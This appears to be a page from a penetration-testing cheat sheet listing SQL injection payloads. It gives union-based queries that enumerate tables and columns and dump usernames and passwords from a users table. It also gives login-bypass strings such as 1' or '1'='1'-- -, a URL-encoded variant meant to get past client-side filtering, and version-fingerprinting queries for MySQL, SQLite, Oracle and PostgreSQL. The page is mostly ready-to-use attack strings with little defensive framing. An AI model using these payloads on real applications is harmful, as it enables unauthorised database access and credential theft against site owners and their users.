SQL Injection

Various SQL injection playloads.

Union Based

 or 1=1#

1' ORDER BY 10#

1' UNION SELECT version(),2#

1' UNION SELECT version(),database()#

1' UNION SELECT version(),user()#

1' UNION ALL SELECT table_name,2 from information_schema.tables#

1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#

1' UNION ALL SELECT concat(user,char(58),password),2 from users#

Integer

Considering a form without client-side control, with a user taking only an int and a password, we could use this to bypass :

1 or 1=1-- -

String escape

Considering a form without client-side control, with a user field putting data as a string like 'input' we could use this to bypass :

1' or '1'='1'-- -

URL injection

Considering a form with client-side control avoiding specials characters, with a user field putting data as a string like 'input' we could use this to bypass :

1' or '1'='1'-- -

Encoded in URL

%31%27%20%6f%72%20%27%31%27%3d%27%31%27%2d%2d%20%2d

Find database version

SQL

SELECT @@version

',nickName=@@version,email='

SQLite

',nickName=(sqlite_version())"'

Oracle

SELECT * FROM v$version

',nickName=(SELECT banner FROM v$version),email='

PostgreSQL

SELECT version()

Database-specific syntax

Oracle

On Oracle, every SELECT query must use the FROM keyword and specify a valid table. There is a built-in table on Oracle called dual which can be used for this purpose.

' UNION SELECT NULL FROM DUAL--

Listing the contents of the database

List tables in database

SELECT * FROM information_schema.tables

List content in column

SELECT * FROM information_schema.columns WHERE table_name = 'Users'

Blind SQL injection

Blind SQL injection occurs when an application is vulnerable to SQL injection, but its HTTP responses do not contain the results of the relevant SQL query or the details of any database errors.

PreviousMySQL NextWiFi Hacking

Last updated 8 months ago

Was this helpful?